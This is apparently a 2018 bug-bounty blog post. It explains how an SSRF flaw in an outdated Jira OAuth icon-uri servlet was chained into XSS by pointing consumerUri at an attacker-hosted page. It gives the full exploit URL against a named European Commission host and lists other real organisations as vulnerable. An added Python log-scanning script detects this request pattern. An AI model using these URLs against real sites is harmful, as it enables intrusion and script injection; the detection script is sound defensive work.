How I found XSS via SSRF vulnerability -Adesh Kolte

Adesh Kolte
Jun 7, 2018 · 2 min read

Hello

This is Adesh Nandkishor Kolte

First, read these articles

After reading both articles, I figured out a new way to carry out the XSS attack. I discovered that, due to an outdated Jira instance, I was able to exploit an SSRF vulnerability in Jira and perform several actions, such as bypassing any firewall/protection solutions, etc.

So I just tried some basic tricks with Google to find web apps that used Jira integration.

I got the Europa web site:

https://webgate.ec.europa.eu/CITnet/jira/plugins/servlet/oauth/users/icon-uri?consumerUri=

So I quickly visited

plugins/servlet/oauth/users/icon-uri?consumerUri=http://google.com

And boom, I got the Google page and I'm like

I had uploaded an XSS script on my own server, http://adeshkolte.at.ua/h.html

and pasted it in place of google.com

https://webgate.ec.europa.eu/CITnet/jira/plugins/servlet/oauth/users/icon-uri?consumerUri=http://adeshkolte.at.ua/h.html

Then I found many websites vulnerable to it:

Motorola Solution

Mass.gov

Cambridge University Press

Stanford University

Thanks for reading
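A defender's check for the request pattern described above, as an added example that is not part of the original write-up: it scans web access logs for `icon-uri` requests whose `consumerUri` points at a host outside an allowlist. The log lines, the `/jira` context path and the allowlisted host are constructed assumptions.

```python
import ipaddress
import re
from urllib.parse import parse_qs, urlsplit

# Servlet path from the post; a context path such as /CITnet/jira may precede it.
ICON_URI_PATH = "/plugins/servlet/oauth/users/icon-uri"
# Assumption: hosts this Jira legitimately fetches consumer icons from.
ALLOWED_CONSUMER_HOSTS = {"confluence.example.internal"}
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed access-log lines, not real traffic.
SAMPLE_LOG = [
    '203.0.113.7 - - [07/Jun/2018:10:01:02 +0000] "GET /jira/plugins/servlet/oauth/users/icon-uri?consumerUri=http://google.com HTTP/1.1" 200 11502',
    '198.51.100.4 - - [07/Jun/2018:10:01:09 +0000] "GET /jira/browse/ABC-1 HTTP/1.1" 200 8123',
    '203.0.113.7 - - [07/Jun/2018:10:02:40 +0000] "GET /jira/plugins/servlet/oauth/users/icon-uri?consumerUri=http%3A%2F%2F10.0.0.5%3A8080%2F HTTP/1.1" 200 312',
    '198.51.100.9 - - [07/Jun/2018:10:03:11 +0000] "GET /jira/plugins/servlet/oauth/users/icon-uri?consumerUri=https://confluence.example.internal/icon.png HTTP/1.1" 200 950',
]

def classify_target(consumer_uri):
    """Return 'allowed', 'internal', 'external' or 'malformed' for a consumerUri."""
    host = (urlsplit(consumer_uri).hostname or "").lower()
    if not host:
        return "malformed"
    if host in ALLOWED_CONSUMER_HOSTS:
        return "allowed"
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        return "internal" if host == "localhost" else "external"
    inward = ip.is_private or ip.is_loopback or ip.is_link_local
    return "internal" if inward else "external"

def find_icon_uri_abuse(log_lines):
    """Return (line_no, verdict, consumer_uri) for each non-allowlisted fetch."""
    hits = []
    for line_no, line in enumerate(log_lines, 1):
        m = REQUEST_RE.search(line)
        url = urlsplit(m.group(1)) if m else None
        if url is None or not url.path.rstrip("/").endswith(ICON_URI_PATH):
            continue
        # parse_qs percent-decodes, so URL-encoded targets are classified too.
        for target in parse_qs(url.query).get("consumerUri", []):
            verdict = classify_target(target)
            if verdict != "allowed":
                hits.append((line_no, verdict, target))
    return hits

if __name__ == "__main__":
    for hit in find_icon_uri_abuse(SAMPLE_LOG):
        print(hit)
```

An "internal" verdict means the server was asked to fetch from behind the perimeter; an "external" one means it was asked to relay third-party content under the Jira origin, which is the XSS path the post describes.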
